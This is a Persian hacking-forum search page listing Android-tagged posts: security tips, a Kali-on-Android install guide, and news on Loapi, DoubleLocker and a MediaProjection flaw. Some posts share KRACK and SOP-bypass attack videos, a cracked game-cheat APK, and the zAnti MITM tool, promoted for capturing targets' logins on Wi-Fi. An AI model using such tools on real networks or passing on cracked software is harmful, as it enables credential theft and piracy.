رفتن به مطلب
انجمن تیم امنیتی گارد ایران

جستجو در تالارهای گفتگو

در حال نمایش نتایج برای برچسب های 'اندروید'.

  • جستجو بر اساس برچسب

    برچسب ها را با , از یکدیگر جدا نمایید.

  • جستجو بر اساس نویسنده

نوع محتوا


تالارهای گفتگو

  • انجمن گاردایران
    • قوانین و اطلاعیه های سایت
    • اخبار هک و امنیت
    • انتقادات و پیشنهادات
    • بخش خصوصی
    • بخش ویژه - VIP
    • بخش زیر زمینی
  • سوال و جواب های عمومی
    • سوال و جواب های نفوذ به سایت ها و سرورها و روشهای مقابله
    • سوال و جواب های امنیت سیستم های شخصی
    • سوال و جواب های برنامه نویسی
    • سوال و جواب های ابزارهای امنیتی
    • سوال و جواب های شبکه
    • سوال و جواب های مدیریت محتوا و وبلاگ ها
    • سوال و جواب های بخش Trojan , Rat , Keylogger
    • سوال و جواب های سیستم عامل ها
    • سوال و جواب های امنیت ایمیل های شخصی
    • سوال و جواب الکترونیک
    • سوال و جواب های موبایل
    • سوال و جواب های متفرقه
  • انجمن نفوذ و امنیت
    • آموزش های تصویری
    • آموزش های تصویری نفوذ به سیستم های شخصی و روشهای مقابله
    • آموزش های تصویری سایت ها و سرورها و روشهای مقابله
    • آموزشهای تصویری شبکه و روشهای مقابله
    • حملات شبکه و راههای مقابله
    • DOS , DDOS
    • ویروس ها و تروجان ها
    • متاسپلویت Metasploit
    • ابزارهای امنیتی
    • Shell Script
    • آسیب پذیری های وایرلس
    • اکسپلویت
    • باگ های امنیتی
    • امنیت ایمیلهای شخصی
    • تارگت های تمرینی
    • اسکنرها و ابزارهای هکینگ
  • بخش کرک و رمزنگاری
    • ابزار کرک
    • مقالات و آموزشهای کرک
    • مقالات و آموزشهای رمزنگاری
    • ابزارهای رمزنگاری
    • پروکسی لیست
    • پسورد لیست و کمبو لیست
    • کانفیگ
    • اکانت های کرک شده
  • برنامه نویسی
    • برنامه نویسی
    • برنامه نویسی تحت وب
  • بخش موبایل
    • بخش مخصوص موبایل
    • هک موبایل
  • شبکه
    • Cisco سیسکو
    • نتورک پلاس Netwok+
    • مایکروسافت Microsoft
    • میکروتیک Microtics
    • مجازی سازی
    • ابزارهای شبکه و مانیتورینگ
    • فایروال
  • سیستم عامل
    • لینوکس
    • ویندوز
    • کالی لینوکس Kali Linux
    • مکینتاش
  • الکترونيک و روباتيک
    • الکترونيک
    • ميکروکنترلرها و پروسسور ها
    • نرم افزار هاي تخصصي برق و الکترونيک
    • روباتيک
  • گرافيک
    • فتوشاپ
    • فلش
  • متفرقه
    • بحث آزاد

جستجو در ...

نمایش نتایجی که شامل ...


تاریخ ایجاد

  • شروع

    پایان

آخرین بروزرسانی

  • شروع

    پایان

فیلتر بر اساس تعداد ...

تاریخ عضویت

  • شروع

    پایان

گروه

Website URL

Yahoo

Skype

محل سکونت

35 نتیجه پیدا شد

  1. 1TED

    امنیت تلفن های همراه

    یک موضوع پاسخی ارسال کرد برای 1TED در آموزشهای بخش موبایل

    درود ../ با آموزش امنیت در تلفن همراه کنار شما هستیم این تاپیک رو زدم فکر کردم شاید براتون مهم باشه که بدونید امنیت تلفن همراهتون چقدره و اگه هک شده باشید ، چه کاری باید انجام بدید ؟ خوب دوست ندارم خیلی برم تو حاشیه پس یه سره میرم سر اصل مطلب ! اولین بحث ما سر چیه ؟ سر اینه که امنیت ما از راه دور چجوری تحدید میشه ؟ شاید براتون جالب باشه که بدونید یک هکر میتونه از تو خونه خودش تلفن همراه شمارو کنترل کنه درست مثل تلفن خودش اما چجوری ؟ فکر میکنم قبلا آشنا شده باشید ، نرم افزار هایی تحت عنوان رات ها به بازار اومدن که بلافاصله پس از استفاده از اونا ، گوشی قربانی ، مورد نفوز قرار میگیره ! پـ ـس اول اینکه حتما حتما حتما نرم افزار هایی که نمیشناسید رو نصب نکنید ! دوم اینکه در هنگام نصب حتما به دسترسی هایی که از شما میخواد ، دقت کنید ! و سوم هم اینکه حتما حتما حتما یه نرم افزار آنتی ویروس قوی رو گوشیتون داشته باشید امٌا این شامل همه گوشی ها میشه (چه اندروید چه آی او اس چه ویندوز فون و ....) **** سعی کنین گوشیتونو هیچ وقت روت نکین ! (Android) سعی کنید هیچ وقت گوشیتونو جیرینگ نکنید ! (IOS) **** چرا ؟ چون دسترسی های اضافی به شما و به گوشی شما میده و شما به فایل های سیستمی دسترسی دارید در این صورت هکر در صورت موفقیت در نفوذ به گوشی همراه شما ، میتونه به فایل های سیستمیتون دسترسی پیدا کنه و حتی گوشیتونو نابود کنه یا یه کاری کنه که ویروس برای همیشه تو گوشیتون باقی بمونه ! **** هرگز فایل های حیاتیتونو تو کارت SD یا رمتون نریزید ! اینطوری وقتی گوشیتون به سرقت رفت ، دیگه از فایل هاتون نگران نباشید ! **** حتما حتما حتما یه نرم افزار رد یاب نصب کنید رو گوشیتون یا حتما یه جیمیل تعریف کنید برای خودتون ( تو گوشی ) چرا اولی به خاطر اینکه گوشیتون اگه به سرقت رفت ، به راحتی پیدا شه دومی هم به خاطر Android Device Manager هست ! با این امکان میتونید در صورتی که گوشیتون به سرقت رفت سه کار انجام بدید ! به گوشیتون از راه دور دستور بدین بدون هیچ کاری با صدای آخر خودش شروع به زنگ زدن کنه ( برای اثبات اینکه گوشی برا خودتونه ) یا از این سرویس بخواین محل دقیق گوشیتونو بهتون بگه یاااا که از همه مهم تره این که به این سرویس دستور بدین که گوشیتونو به صورت کامل فرمت کنه ! ( خیلی کارایی داره ) **** هرگز به وای فای های رایگان مشکوک وصل نشید :| وقتی میرین یه جایی نوشته وای فای صلواتی مگه سر درد داره بهتون مجانی وای فای بده :| مگه رو گنج نشسته :| ( به شما هم که نت بدی اولین کار اینه میرین کالی دانلود کنین مثل ندید بدیدا :| ) حالا وقتی شما به یه وای فای مجانی وصل شید ممکنه چه اتفاقی بیفته ؟ ممکنه شما اسنیف شید ! نمیخوام بیشتر توضیح بدم برید تحقیق کنید :| پـ ـس فقط به وای فای هایی که اطمینان دارید وصل شید ! **** روی لینک های مشکوک به هیچ وجه کلیک نکنید ! ممکنه به کوکی هاتون دستبرد زده بشه ! **** هرگز ایمیل های مشکوک رو چه با تلفن همراه چه با کامپیوترتون باز نکنید ! ممکنه هکر با ارسال کد های مخرب به شما ، کنترل کل گوشیتونو در اختیار بگیره :| **** سعی کنید نرم افزار ها و بازی هایی که نیاز دارید رو از جا های معتبر مثل کافه بازار و گوگل استور و ... دانلود کنید ! **** سعی کنید همیشه آپدیت های رسمیی که برا گوشی ها منتشر میشه رو رو گوشیتون بریزید ! ممکنه باگی رو برطرف کرده باشن و شما خبر نداشته باشین :| امید وارم این آموزش مورد قبول واقع بشه #مطلب_اختصاصی_گارد_ایران کپی برداری فقط با ذکر منبع حلال است ! م.و.ف.ق باشید ../ یا حـ ـق
  2. SHIWPTS13
    سلام اینجا میخواهم به شما آموزش نصب کالی لینوکس در اندروید را بدهم پس گوشیتون را آماده کنید! من دو روش نصب با روت و بدون روت به شما آموزش خواهم داد. نکته: با روت کردن گوشی از خدمات گوگل پلی محروم خواهید شد به همین دلیل لینک دانلود نرم افزار ها از مایکت تهیه شده است. با روت: ابتدا شما باید نرم افزار ترموکس(دانلود از مایکت) دانلود و نصب کنید. سپس نرم افزار Anlinux(دانلود از مایکت) را دانلود و نصب کنید. نرم افزار anlinux را باز کنید و گزینه dashboard را انتخاب کنید، کاربرد و راه استفاده صحیح از گزینه های دیگر را بعد از نصب کالی لینوکس به شما توضیح خواهم داد. گزینه اول choose را انتخاب کنید(برای شما چندین سیستم عامل می آید که شما kali را انتخاب کنید)، سپس روی copy برای کپی دستورات نصب، کلیک کنید، سپس روی launch کلیک کنید. اگر نرم افزار ترموکس را نصب کرده باشید برای شما نرم افزار ترموکس باز خواهد شد سپس انگشت مبارکتان را روی صفحه نگه دارید تا گزینه paste برای شما ظاهر شود، روی آن کلیک کنید و enter را بزنید. بستگی به سرعت اینترنت شما دارد که چقدر طول بکشد.حجم آن تقریبا ۷۱ مگابایت است. پس از اتمام نصب با دستور زیر آن را اجرا کنید: ./start-kali.sh اگر برای شما root@localhost#~$ ظاهر شد تبریک میگویم کالی لینوکس ورژن 2020.3 با موفقیت برای شما نصب شده است. حالا...میرسیم به آن گزینه هایی که برای ما هنگام باز کردن نرم افزار anlinux ظاهر شدند. توجه! توجه! توجه!: برای اجرای صحیح این دستورات باید حتما سیستم عامل کالی را فعال کنید سپس در سیستم عامل کالی آن ها را اجرا کنید. خب، اگر دقت کنید سیستم عامل ما رابط گرافیکی ندارد، و برای اجرای نرم افزار هایی همچون Firefox به مشکل بر خواهید خورد. پس ما از یکی از آن گزینه ها به اسم Desktop environment را انتخاب میکنیم، سپس روی گزینه CHOOSE (اولی) کلیک میکنیم و سیستم عامل kali را انتخاب میکنیم در گزینه CHOOSE (دومی) شما حق انتخاب دارید اگر رابط گرافیکی زیبایی میخواهید MATE را انتخاب کنید یا اگر حافظه گوشی شما کم است گزینه Xfce4 را انتخاب کنید، سپس COPY را انتخاب کنید و روی LAUNCH کلیک کنید. یادآوری: سیستم عامل کالی را فعال کنید سپس دستور مورد نظر را اجرا کنید. توجه کنید که در حین نصب از شما یک رمز میخواهد. پس از نصب رابط گرافیکی بدون ارور و کامل شما باید نرم افزار Vnc viewer( دانلود از مایکت) را نصب کنید، سپس ان را اجرا کنید بعد از اجرا، یک کانکشن جدید درست کنید و روی 127.0.0.1:5901 تنظیم کنید سپس کانکت کنید و آن رمزی که از شما خواست را به آن بدهید. شما الان در محیط کاری لینوکس هستید!! توجه کنید که اگر ترموکس را به طور کامل ببندید دیگر نخواهید بود با vnc viewer متصل شوید پس کالی لینوکس را فعال کنید و دو دستور زیر را در آن به ترتیب اجرا کنید: vncserver-stop vncserver-start بدون روت: برای نصب کالی لینوکس بدون روت با پایداری بالا در اندروید شما باید نرم افزار userland(دانلود از مایکت) را نصب کنید سپس نرم افزار userland را باز کنید و منتظر باشید سیستم عامل های قابل نصب برای شما لود شود. بعد هم روی سیستم عامل Kali کلیک کنید،یک نام کاربری و رمز عبور انتخاب کنید و روی ادامه کلیک کنید، منتظر دانلود کامل و آماده سازی فایل ها بمانید. اگر نرم افزار vnc viewer را نصب کرده باشید وارد آن میشوید و رمزی که انتخاب کردید را وارد میکنید و از کالی لینوکس لذت ببرید. برای شما تمامی لینک های دانلود نرم افزار ها از مایکت را قرار داده ام. امیدوارم که لذت برده باشید، لایک فراموش نشه، موفق و پیروز باشید. untitled.txt
  3. irajgsm
    سلام دوستان برای شروع چه زبانی رو پیشنهاد میدید؟ایا این کار تک نفره میشه انجام داد؟تو برنامه نویسی چه کاری رو میشه تنهایی به نتیجه رساند و درامد زا باشه؟؟؟
  4. An0int3d
    سلام خدمت کاربرای عزیز میخوام به شما نحوه میرور سازی و ایجاد تصویر گوشی اندرویدیتون روی کامپیوتر آموزش بدم ، البته اضافه کنم برای انجام این کار برنامه های زیادی وجود دارند که طریق وای فای سینک این کار رو انجام میدهند اما نیاز به نصب و کد گیری از هر دو دیوایس مورد نیاز برای اتصال دارند ، من شخصا علاقه زیادی به پخش لایو از طریق pc خودم روی لایو استوری اینستا دارم ، این کار رو با روش دیگه ای انجام میدم و برنامه ای برای توقف حالت لایو و راه اندازی مجدد پروتکل اجرایی اینستا نوشتم ک بزودی سعی میکنم تاپیک اموزشیش رو تهیه کنم ، اما این میرور سازی به شما در ایجاد لایو های 5 دقیقه ای کمک میکنه ، بیشتر از 5 دقیقه احتمال خارج شدن اتومات گوشی از برنامه های مختلف وجود داره (برای رفع رو حالت فیلم برداری تنظیم کنید) خب بریم برای نحوه اتصال و میرور سازی : 1. برنامه زیر رو دانلود کنید و روی سیستم خودتون نصب کنید (نیازی به برنامه ای برای همراه خودتون نیست!) دانلود 2. حالت usb debugging رو از قسمت developer option فعال کنید ( برای فعال سازی دولوپر اپشن از قسمت about روی build number هفت بار تپ کنید ) 3. حالا برنامه را باز کرده و با استفاده از find device دستگاهتون رو شناسایی و میرور کنید تامام این سیستم تفاوتی با بقیه میرور سازی ها از طریق وای فای نداره و تنها فرقی که داره نیاز به نصب نبودن برنامه روی گوشی هستش و همچنین نیازی به روت نداره در پست بعدی یک اموزش میرور سازی با گوگل کروم رو هم به شما میدم امیدوارم مورد استفاده شما قرار بگیره موفق و سربلند باشید
  5. mownten
    آموزش ساده ای هست و مفهوم krack رو به راحتی به بیننده نشون میده. حمله خطرناک krack این هست که بدون داشتن پسورد یک مودم و ورود به شبکه داخلی بین موبایل و مودم، بتونید ببینید موبایل چه اطلاعاتی رو داره از طریق مودم ردوبدل میکنه. آموزش به زبان انگلیسی و استفاده شده از محیط های شبیه سازی اندروید دانلود شده از Youtube رمز عبور: guardiran.org KRACK Attacks- Bypassing WPA2 against Android and Linux - YouTube.part1.rar KRACK Attacks- Bypassing WPA2 against Android and Linux - YouTube.part2.rar KRACK Attacks- Bypassing WPA2 against Android and Linux - YouTube.part3.rar KRACK Attacks- Bypassing WPA2 against Android and Linux - YouTube.part4.rar
  6. MR.MAGIC
    نسخه پایدار اندروید 8 اوریو برای گلکسی اس 8 و گلکسی اس 8 پلاس سامسونگ در راه است. در ادامه اطلاعات بیشتری در اختیار کاربران گلکسی S8 و گلکسی S8 پلاس علاقه‌مند به دریافت آپدیت اندروید 8 قرار می‌دهیم. کاربرانی که برای چشیدن طعم اندروید 8 اوریو بر روی گلکسی اس 8 و گلکسی اس 8 پلاس خود بی‌‌صبرانه منتظر بوده و دوست نداشتند تا زمان انتشار نسخه پایدار آن انتظار بکشند، از مدت‌ها قبل قادر بودند نسخه بتای این سیستم عامل را بر روی گوشی موبایل خود تست کنند. این کار یک مزیت بزرگ دیگر نیز داشت. سامسونگ با دریافت بازخورد از این کاربران، باگ‌های سیستم عامل اندروید جدید توسعه یافته برای پرچمدارانش را رفع کرده و نسخه پایدار آن را زودتر منتشر می‌کند. تاکنون نزدیک به پنج پچ و آپدیت برای نسخه بتای اندروید 8 اوریو برای گلکسی اس 8 و گلکسی اس 8 پلاس منتشر شده است و حالا وقت آن رسیده تا نسخه نهایی عرضه شود. بر اساس لیستی که در Wi-Fi Alliance رویت شده است، تعداد زیادی از مدل‌های پرچمداران سری S سال 2017 به‌روزرسانی سیستم عامل جدید را دریافت می‌کنند. گوشی های دارای شماره مدل SM-G950F ،SM-G955F ،SM-G950FD ،SM-G955FD ،SM-G950N ،SM-G955N ،SM-G950X ،SM-G955X ،SM-G950XN ،SM-G955XN و SM-G950XC آپدیت سیستم عامل جدید را دریافت خواهند کرد. این شماره مدل‌ها مربوط به گلکسی اس 8 و گلکسی اس 8 پلاس بازارهای اروپا، آسیا (هند و سنگاپور)، کره و همچنین نسخه جهانی دو مدل هستند. این اطلاعات با شایعات پیشین هماهنگی دارند، شایعاتی که بر اساس آن‌ها زمان انتشار اندروید 8 اوریو برای گلکسی S8 و گلکسی S8 پلاس انتهای ماه ژانویه (ماه کنونی) اعلام شده بود. نکته عجیب در این لیست، عدم مشاهده نسخه‌ مخصوص آمریکا (دارای تراشه اسنپدراگون کوالکام) است. به نظر می‌رسد کاربران آمریکایی گلکسی اس 8 و گلکسی اس 8 پلاس، مخصوصا آن‌هایی که گوشی خود را تحت قرارداد اپراتورها دریافت کرده‌اند، باید مدت زمان بیشتری منتظر بمانند. #phonearena
  7. mownten
    با سلام خدمت دوستان عزیز. توی بلاگ خبری در خصوص مشکلی در مرورگر اندروید مشهور به SOP Bypass رو منتشر کرده بودم که الان برای درک بهتر اون موضوع، یک ویدیو از خود کاشف آسیب پذیری و یک ویدیو هم از نحوه ی استفاده از اون اسیب پذیری توی متااسپلویت که لینکش هم توی خبر هست اینجا میذارم. رمز عبور : guardiran.org SOP Bypass Samsung Internet Browser Dhiraj Mishra.part1.rar SOP Bypass Samsung Internet Browser Dhiraj Mishra.part2.rar
  8. mownten
    تلفن های هوشمند به تدریج به دستگاه اصلی بسیاری از مردم در سراسر جهان تبدیل می شوند و عجیب نیست که جایگزین شدن دسکتاپ ها توسط گوشی های موبایل باعث شده باشد هکرها و راهزنان سایبری هم رفته رفته تمرکز خود را بر روی توسعه روش های مخرب و بدافزارهایی برای این پلتفرم قرار دهند. معمولا بدافزارهای موبایلی یک یا دو هدف را دنبال می کنند که عبارت اند از استراق سمع و به سرقت بردن اطلاعات کاربران یا نمایش آگهی از طریق نصب برنامه های ناخواسته بر روی گوشی قربانیان و کسب درآمد از این روش. اما اخیرا موسسه کسپرسکی بدافزاری را کشف کرده که به دلیل نوع عملکردش به آن لقب "آچار فرانسه" داده است. به گزارش Extreme Tech، این بدافزار موبایلی که Loapi نام دارد از تمامی ماژول های ممکن برای انجام هر نوع فعالیت مخربی بر روی گوشی های آلوده استفاده میکند. طیف فعالیت های این بدافزار به حدی گسترده است که از نمایش آگهی ها گرفته تا استخراج ارز مجازی (Cryptocurrency مانند بیت کوین و مشابه آن) را تحت پوشش قرار می دهد و به اندازه ای در این فعالیت ها خرابکارانه زیاده روی می کند که در نهایت می تواند به دلیل عملکرد وحشتناک پردازنده باعث انفجار باتری گوشی شود. نکته بسیار مهم درباره Loapi آن است که هیچ روش جدیدی برای نفوذ آن به تلفن های هوشمند کشف نشده و از تکنیک مهندسی اجتماعی برای انتشارش استفاده می شود. در نتیجه بسیاری از تلفن های هوشمند به دلیل مراجعه به وب سایت های آلوده یا از طریق لینک های انتقالی به این بدافزار دچار می شوند. جالب آنکه حتی روش این کار نیز بسیار پیش پا افتاده است. با مراجعه به برخی وب سایت های خاص، بدافزار از کاربر می خواهد برنامه ای با پسوند APK را بر روی گوشی خود نصب کند که همان فایل آلوده است. شاید به نظر برسد همه کاربران از نصب این برنامه خودداری می کنند اما در کمال شگفتی بسیاری از آنها به راحتی به نصب اپلیکیشن می پردازند. پس از نصب برنامه، Loapi چند ماژول اختصاصی را از سرور کنترلی خود دانلود کرده و به این طریق فعالیت هایی مانند پیوستن به باتنت ها، نمایش تبلیغات بر روی گوشی، ارسال پیام های متنی برای آلوده کردن کاربران بیشتر و حتی تلاش برای به دست آوردن ارز مجازی را انجام می دهد و در این مسیر حتی آیکون برنامه را نیز مخفی می کند تا حذف آن با مشکل مواجه شود. ارز مجازی که توسط این بدافزار برای توسعه دهندگان آن استخراج می شود Monero نام دارد که در حال حاضر قیمت آن در حدود 400 دلار است. به گفته کسپرسکی نوع فعالیت برای استخراج ارز مجازی توسط بدافزار Loapi به گونه ای است که می تواند باعث نابودی گوشی و انفجار آن شود. تقریبا همه گوشی های آزمایشگاه کسپرسکی که برای بررسی این بدافزار از آنها استفاده می شده است به دلیل گرمای بیش از حد پردازنده و دفرمه شدن باتری منفجر شده اند. برای مقابله با آلوده شدن گوشی به این نرم افزار تنها کافیست از نصب برنامه های مشکوک که از طریق لینک ها یا وب سایت های ناشناس به شما معرفی می شوند خودداری کنید. منبع : مجله سخت افزار
  9. mownten
    حفره امنیتی که در نسخه‌های لالی‌پاپ، مارشملو و نوقای سیستم‌عامل اندروید رصد شده این امکان را به نفوذگران می‌دهد تا محتویات صفحه‌نمایش و صدای خروجی از سیستم صوتی دستگاه‌های اندرویدی را ضبط کنند. براساس بررسی‌های انجام شده، چیزی حدود ۷۷.۵ درصد از دستگاه‌های اندرویدی از این مشکل رنج می‌برند. حفره امنیتی که در MediaProjection سیستم‌عامل اندروید رصد شده است طیف وسیعی از دستگاه‌های اندرویدی را در مقابل نفوذ هکرها، بی‌دفاع گذاشته است. MediaProjectionسرویسی با توانایی ضبط محتویات صفحه‌نمایش و صدای سیستم صوتی دستگاه‌های اندرویدی به حساب می‌آید. این سرویس از آغاز در اندروید ادغام شده بوده اما برای استفاده از آن، اپلیکیشن‌ها به دسترسی روت نیاز داشتند و نیاز به هماهنگی با کدهای پایه دستگاه بود. همین امر، استفاده ازMediaProjection را تنها به اپلیکیشن‌هایی با دسترسی سیستمی محدود کرده بود. اپلیکیشن‌هایی که توسط شرکت سازنده دستگاه‌ اندرویدی روی گوشی نصب می‌شدند. این در حالی است که با انتشار اندروید لالی‌پاپ (۵.۰)، گوگل دسترسی به این سرویس را آزاد‌تر کرد. مشکل اینجاست که گوگل دسترسی به این سرویس را به دریافت مجوز از کاربر از طریق رابط کاربری اپلیکیشن‌ها منوط نکرده است. در عوض، کادر محاوره‌ای ساده‌ای روی صفحه‌نمایش پدیدار می‌شود که هشداری را مبنی بر ضبط محتویات صفحه‌نمایش و صدای سیستمی، در مقابل کاربر قرار می‌دهد. نفوذگران سایبری با پیش‌بینی زمان نمایش این پیغام موفق شده‌اند از تکنیک Tap-Jacking استفاده کرده و پیغام متفاوتی را برای دسترسی به المان‌های سیستمی، روی پیغام پیش‌فرض اندروید سوار کنند. نکته قابل توجه اینکه گوگل این حفره امنیتی را تنها در اندروید ۸.۰ اوریو مرتفع کرده است. از همین رو، نسخه‌های قدیمی‌تر اندروید همچنان در مقابل نفوذهای احتمالی هکرها با استفاده از این روش، بی‌دفاع هستند. البته محققان امنیتی مدعی شده‌اند این حملات به طور صد‌درصد در خفا و بدون سروصدا انجام نشده و همزمان با پیاده‌سازی حملات، آیکون اسکرین‌شات در نوار هشدارهای دستگاه اندرویدی کاربر ظاهر می‌شود. منبع : شهر سخت افزار
  10. mownten
    برنامه Cheat Droid به شما این امکان را می دهد تا بتوانید فایل هایی که از برنامه های نصب شده در گوشی وجود دارند را ویرایش کنید. این کار می تواند امکانات بسیار زیادی را در اختیار شما قرار دهد. به این ترتیب می توانید فایل های سیستمی که از نصب برنامه ها در گوشی شما وجود دارند را ویرایش کرده و یا حتی آنها را حذف کنید. با استفاده از Cheat Droid می توان در بازی های اندرویدی تقلب نیز کرد و میزان سکه ها و پول ها را در بازی های آفلاین مختلف تغییر داد. برای این کار باید به محل نصب شدن بازی مورد نظر رفته و فایل های مربوط به آن را ویرایش کنید. توجه داشته باشید که برای نصب این نرم افزار در گوشی خود، باید گوشی تان را روت کنید. ویژگی ها: مشاهده، ویرایش، اضافه کردن، جستوجو در میان فایل ها قابلیت خارج کردن و وارد کردن فایل های مهم بارگذاری از طریق فهرست فایل های sqlite خارج کردن و وارد کردن هر فایل برنامه ای (نسخه Pro) امکان ویرایش فهرست فایل های sqlite (نسخه Pro) آخرین نسخه این برنامه رو پیوست کردم. توضیح مختصر هم بدم که شما با این نرم افزار میتونید دیتابیس باقی برنامه ها رو ویرایش کنید و از اونجا که بازی های اندروید (غالبا بازی های ساده تر نسبت به بازی های سه بعدی ) دارای کدنویسی های ساده تری هستن ، احتمال این میره که شما دسترسی راحتی به دیتابیس بازی ها داشته باشید. کلا نرم افزارهای چیتینگ یا دیتابیس رو در زمان عدم اجرای بازی تغییر میدن. بعضی وقتها هم بازی هم در زمان اجرا متغیرهایی رو ایجاد میکنن و به ستون های مخصوص توی دیتابیس اختصاص میدن مثلا یه متغیر نوع 4 Byte یا Float یا Double ایجاد میکنن و در حین بازی این عدد ها تغییر میکنه که شما با نرم افزارهای مخصوص میتونید پیداشون کنید و تغییرشون بدید مثل نرم افزار Game hacker موفق و موید باشید Cheat_Droid_Pro_v2.3.1_Cracked.apk
  11. mownten

    معرفی نرم افزار zAnti اندروید

    یک موضوع پاسخی ارسال کرد برای mownten در هک موبایل

    با سلام خدمت دوستان عزیزامروز میخوام نرم افزار بسایر مفید zAnti رو معرفی کنم. این نرم افزار یکی از محصولات چهارگانه تأمین امنیت ارائه شده توسط وبسایت Zimperium هستش. حجم نرم افزار 16 مگ حجم ویدیو آموزشی ارائه شده توسط خود zimperium نسخه 2.5 قابلیت ها: URL MITM Session hijacking audit Image Replacement Scan Detection URL Redirect File Replacement و غیره نیاز به روت گوشی داره. توی شبکه وای فای سرچ میکنه، تارگت رو انتخاب میکنید، MITM رو فعال میکنید و شروع می کنید به تست نفوذ. ماهیت این برنامه ارزیابی میزان امنیت شبکه و تست نفوذ هست. یکی از قابلیت های شیرین این برنامه Session hijacking audit هست که اگر تارگت با مرورگر وارد یک وبسایت بشه و اونجا یوزرنیم و پسورد بزنه، قابل مشاهده خواهد بود. همیشه ایمن باشید. پسورد فایل ها : guardiran.org قابل توجه اینکه نرم افزار معروف dsploit از تاریخ 12 آبان 1393 با نرم افزار zAnti ادغام شده و دیگه نیازی به استفاده از نرم افزار dsploit نیست. zAnti MITM Tutorial.part2.rar zAnti MITM Tutorial.part1.rar zANTI2.5.part2.rar zANTI2.5.part1.rar zANTI2.5.part3.rar
  12. mownten
    محققین امنیتی باج‌افزار جدیدی را در سیستم عامل اندروید شناسایی کرده‌اند که اطلاعات را در دستگاه‌های آلوده شده رمزگذاری کرده و همچنین شماره پین را تغییر می‌دهد. بدین ترتیب کاربر که دیگر قادر به استفاده از دستگاهش نیست، مجبور می‌شود به خواسته‌های افراد مجرم تن دهد. این باج‌افزار که با نام DoubleLocker شناخته می‌شود از طریق دانلود جعلی برنامه فلش پلیر در وب‌سایت‌های آلوده پخش می‌شود. این باج‌افزار سپس با اجرای برنامه جعلی فلش پلیر فعال خواهد شد. برنامه درخواست دسترسی خود را تحت نام Google Play Service به کاربر ارائه کرده و بدین ترتیب از دسترسی تایید شده به منظور در اختیار داشتن اختیارات ادمین سوءاستفاده کرده و خود را به عنوان اپلیکیشن پیش‌فرض Home تعیین می‌کند، بدون اینکه کاربر خبر داشته باشد. از آنجایی که باج‌افزار خود را به عنوان لانچر تعریف کرده، هر زمان که کاربر روی دکمه Home لمس کند باعث فعال شدن آن خواهد شد. برای خلاص شدن از دست باج‌افزار DoubleLocker ، تنها راه انجام فکتوری ریست می‌باشد. همچنین اگر از یک دستگاه روت شده استفاده می‌کنید بدون انجام فکتوری ریست می‌توانید از قفل پین عبور کنید. بدین منظور باید دستگاه پیش از فعال شدن باج‌افزار در حالت Debugging قرار گرفته باشد. اگر چنین بود باید دستگاه را در حالت ADB به کامپیوتر متصل کرده و سپس تمام فایل‌های سیستمی اندروید که پین کد در آنها ذخیره می‌شود را حذف نمایید. این فرآیند منجر به باز شدن قفل و دسترسی کاربر به دستگاهش خواهد شد. سپس در حالت Safe Mode کاربر می‌تواند اختیارات ادمین را برای این باج‌افزار غیرفعال کرده و سپس آن را حذف نماید. در برخی مواقع ریبوت کردن دستگاه ضروری خواهد بود. باج‌افزار DoubleLocker بر پایه یک تروجان بانکی طراحی شده و اگرچه در حال حاضر ماژولی برای دزدیدن اطلاعات بانکی افراد ندارد، اما این قابلیت در آینده به سادگی قابل افزودن خواهد بود. در واقع به گفته یکی از محققین شرکت امنیتی ESET، باج‌افزار DoubleLocker ممکن است به یک ابزار دو مرحله‌ای با عنوان باج‌افزار-بانک‌دار تبدیل شود که ابتدا حساب بانکی یا پی‌پال شما را پاک کرده و سپس دستگاه و اطلاعات درون آن را قفل نموده و از شما درخواست باج می‌کند. تا این لحظه میزان باج درخواستی دابل‌لاکر چیزی حدود 73 دلار است که از کاربر خواسته می‌شود ظرف مدت 24 ساعت پرداخت گردد. به گفته ESET پس از گذشت این مدت زمان، مهاجمین اطلاعات کاربر را پاک نکرده و به همان حالت رمزگذاری شده نگه می‌دارند. این شرکت امنیتی به کاربران توصیه می‌کند ضمن استفاده از یک آنتی‌ویروس مناسب در اندروید، ویژگی Unknown Sources را حتما در حالت غیرفعال قرار دهند تا درگیر چنین سوءاستفاده‌هایی نگردند. همچنین کاربران باید همواره حواسشان به مجوزهای درخواستی باشد و بدون دقت این دسترسی‌ها را به اپلیکیشن‌های مختلف ندهند. منبع: wccftech "لازم به ذکر هست که این نوع الگوریتم فعالیت باج افزار یک روش ابداعی بوده که در اینده میتواند دارای پیچیدگیهای بیشتری شود."
  13. 1nd3x
    اطلاعات جدیدی درباره یک از محصولات سازمان جنگال: بد افزار موبایل پروژه ۲۲۰ مرکز تحقیقات امنیت کاوش قابلیت شنود و جمع آوری اطلاعات گوشی های اندروید و آی فون را دارد. این اطلاعات شامل: استخراج پیامکهای ارسالی و دریافتی به صورت آنلاین و ذخیره شده، استخراج تماسهای برقرار شده به صورت آنلاین و ذخیره شده، استخراج لیست مخاطبین، مکانیابی از طریق "GPS" یا آنتن های شبکه مخابراتی می باشد. مستندات زیر (سناریو تست و مستندات فنی سایت فرماندهی و کنترل) دقیقا این قابلیت ها را توضیح داده. مثلا: به نقل قول مستندات پروژه ۲۲۰: "پس از نصب بد افزار و شروع فعالیت این ماژول ابتدا پیامکها، تماسها و مخاطبین فعلی را استخراج کرده و به صورت رمز در صف ارسال قرار می دهد تا به سرور ارسال شوند. سپس به حالت آنلاین رفته و اطلاعات پیامکهای تبادلی، تماسها و هر گونه تغییر در لیست مخاطبین را دریافت کرده و به صورت رمز ارسال می کند". برای دانلود "مستندات فنی طراحی و پیاده سازی سایت فرماندهی و کنترل پروژه ۲۲۰" لطفا اینجا کلیک کنید برای دانلود "سناریو تست پروژه ۲۲۰" لطفا اینجا کلیک کنید
  14. narvan

    آپلود برنامه در ایران اپس

    یک موضوع پاسخی ارسال کرد برای narvan در برنامه نویسی موبایل

    سلام.من برنامه هایی رو که مینویسم روی ایران اپس از اسم برنامه خطا میگیره و میگه اسم برنامه اشتباهه.حتی برنامه هایی که پکیج نیم هم ندارند هم همینطوره.ولی روی کندو به راحتی آپ میشن.مشکل کجاست؟
  15. amin2vejdani
